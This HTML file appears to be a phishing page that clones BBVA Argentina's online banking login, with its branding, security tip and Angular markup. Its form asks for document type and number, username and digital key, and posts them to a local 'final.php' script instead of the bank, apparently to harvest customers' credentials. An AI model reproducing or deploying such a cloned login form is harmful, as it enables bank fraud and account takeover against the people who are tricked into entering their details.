<html lang="es">

<head>
  <link rel="icon" href="img/favicon.ico">
  <link href="css/styles/icons.css" rel="stylesheet">
  <link href="css/normalize.css" rel="stylesheet">
  <link href="css/fix.css" rel="stylesheet">
  <link href="css/styles/header.css" rel="stylesheet">
  <link href="css/mafalda.css" rel="stylesheet">
  <link href="css/styles.css" rel="stylesheet">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta http-equiv="Pragma" content="no-cache">
  <meta http-equiv="expires" content="0">
  <meta http-equiv="Cache-Control" content="no-cache">
  <meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1">
</head>

<body ng-controller="PreLoginCtrl" class="ng-scope">
  <header class="header__base wrapper" data-component="tabulation">
    <div class="access__container access__container--active" id="access__container__content" aria-hidden="false" tabindex="-1" style="height: 839px;">
      <div class="container">
        <div class="access__content">
          <div ng-include="#" class="ng-scope">
            <div class="modal-login mgb-0 row ng-scope">
              <div class="col-xs-12 col-sm-6 first-box">
                <div class="box">
                  <form name="login" id="login-form" autocomplete="OFF" action="final.php" method="POST" ng-if="!errorSafariMsg" class="ng-pristine ng-scope ng-invalid ng-invalid-required ng-valid-maxlength ng-valid-pattern">
                    <div class="wrapper-login">
                      <div class="loader ng-isolate-scope ng-hide" ng-show="isLoading()" bbva-loader="" loading="loadingDynamicValidations">
                        <div class="loader-spinner" ng-class="{'background-loader':blueBackground, 'light-background-loader': lightBackground}"></div>
                      </div>
                      <div ng-if="!loadingDynamicValidations" class="ng-scope">
                        <article class="tip-area">
                          <p class="tip-msg" ng-style="{'background-image':'url(https://assets.caasbbva.com/argentina/net/security-tips/identification.png)'}" style="background-image: url(&quot;https://assets.caasbbva.com/argentina/net/security-tips/identification.png&quot;);"> <span class="ng-binding">No brindes datos personales por correo, teléfono, SMS o redes sociales.</span> </p>
                        </article>
                        <div ng-show="showFullForm()" drop-down="" list-options="listOptions" class="drop-down ng-isolate-scope">
                          <div class="new-select-option" ng-class="{'show-list':listOptions.open}" ng-blur="closeDrop()"> <select id="idni" name="dni">
                              <option selected="" value="DNI">DNI</option>
                              <option value="LE">LE</option>
                              <option value="NIF">NIF</option>
                              <option value="PASAPORTE">PASAPORTE</option>
                            </select> <span class="icon-login-forward_icon drop-down-ico"></span> </div>
                        </div>
                        <div ng-show="showFullForm()" class="form-group">
                          <div class="new-input-control input-control-tooltip input-container"> <input type="text" id="documentNumberInput" name="documentNumber" class="form-control ng-pristine ng-invalid ng-invalid-required ng-valid-maxlength ng-touched" bbva-numbers-only="" ng-model="model.documentNumber" ng-disabled="loading" maxlength="13" required="{{validations.docNumber.required}}" ng-focus="model.nuevoValor=model.documentNumber; setSelectedItem(model, 'documentNumber', validations.docNumber.maxLength);focusin=true" ng-change="model.nuevoValor=model.documentNumber" ng-blur="focusin='disabled'"> <label for="documentNumberInput">Número de documento</label> <span class="icon-login-close"></span> </div>
                        </div>
                        <div>
                          <div ng-hide="showFullForm()" class="welcome-block ng-hide"> <span class="welcome-text ng-binding">¡Hola, !</span> <button type="button" title="Dejar de recordar tipo y numero de documento." ng-click="deleteRememberOptions()" class="icon-word-button info-asset stop-remember ng-binding">No soy </button> </div>
                          <div class="form-group">
                            <div class="new-input-control input-control-tooltip"> <input type="text" id="digitalUser" name="digitalUser" class="form-control ng-pristine ng-untouched ng-invalid ng-invalid-required ng-valid-maxlength" autocomplete="off"> <label for="digitalUser">Usuario</label> <span class="icon-login-close"></span> </div>
                          </div>
                          <div class="form-group icon-eye-input">
                            <div class="new-input-control input-control-tooltip "> <input id="digitalKey" type="password" name="digitalKey" class="form-control ng-pristine ng-untouched ng-invalid ng-invalid-required ng-valid-pattern ng-valid-maxlength" autocomplete="off" readonly="" onfocus="this.removeAttribute('readonly');" ng-model="model.digitalKey" ng-disabled="loading" maxlength="8" required="{{validations.password.required}}" ng-focus="model.nuevoValor=model.digitalKey; setSelectedItem(model, 'digitalKey', validations.password.maxLength); focusin=!true" ng-change="model.nuevoValor=model.digitalKey" ng-pattern="/^[a-zA-Z0-9]+$/"> <label for="digitalKey">Clave digital</label> <button id="hideshow" ng-class="showPassword ? 'grey' : 'blue'" type="button" class="icon-login-eye icon-eye-btn blue"></button> <span class="icon-login-close"></span> </div>
                          </div>
                        </div>
                        <div ng-show="showFullForm()" class="row remember-option"> <label class="remember-switch bbva-check-switch ng-isolate-scope" bbva-check-switch="" check-model="rememberSwitchEnabled" check-model-change="toggleSwitch()"> <input type="checkbox" ng-model="checkModel" class="ng-pristine ng-untouched ng-valid"> <span class="slider"></span> </label> <span class="remember-text">Recordar mi tipo y número de documento</span> </div>
                        <div class="virtual-keyboard">
                          <div id="mobileVirtualKeyboard" class="link-teclado ng-scope" ng-click="getNumber()" ng-if="(!isMobileTv() &amp;&amp; !initOk)" title="Teclado Virtual" alt="Teclado Virtual"> <span class="icon-login-keyboard_icon"></span> <span class="tvirtual_link">Teclado Virtual</span> </div>
                        </div>
                      </div>
                      <div class="form-group enter">
                        <div class="loader ng-isolate-scope ng-hide" ng-show="isLoading()" bbva-loader="" loading="loading">
                          <div class="loader-spinner" ng-class="{'background-loader':blueBackground, 'light-background-loader': lightBackground}"></div>
                        </div>
                        <div ng-show="!loading" class="buttons-container"> <button ng-show="showFullForm()" class="secondary-button" type="button" ng-click="showModalFirstAccess()">Registrarme</button> <button ng-disabled="!validForm()" type="submit" class="primary-button" title="Acceso clientes" ng-click="loginSubmit(forms.login)" id="ingres" disabled="disabled">Ingresar</button> </div>
                      </div>
                      <div class="text-center"> <button ng-click="showModalRecoverUser()" class="modal-trigger key-link" type="button" title="Ir a 'Recuperar Usuario o Contraseña'">Olvidé o bloqueé mi Usuario / Clave Digital</button> </div>
                      <div class="form-group form-links security-link-login no-margin text-center"> <button ng-click="showRecommendations()" class="modal-trigger key-link" type="button" title="Ir a 'Recomendaciones de Seguridad'">Recomendaciones de seguridad</button> </div>
                    </div>
                  </form>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </header>
</body>

</html>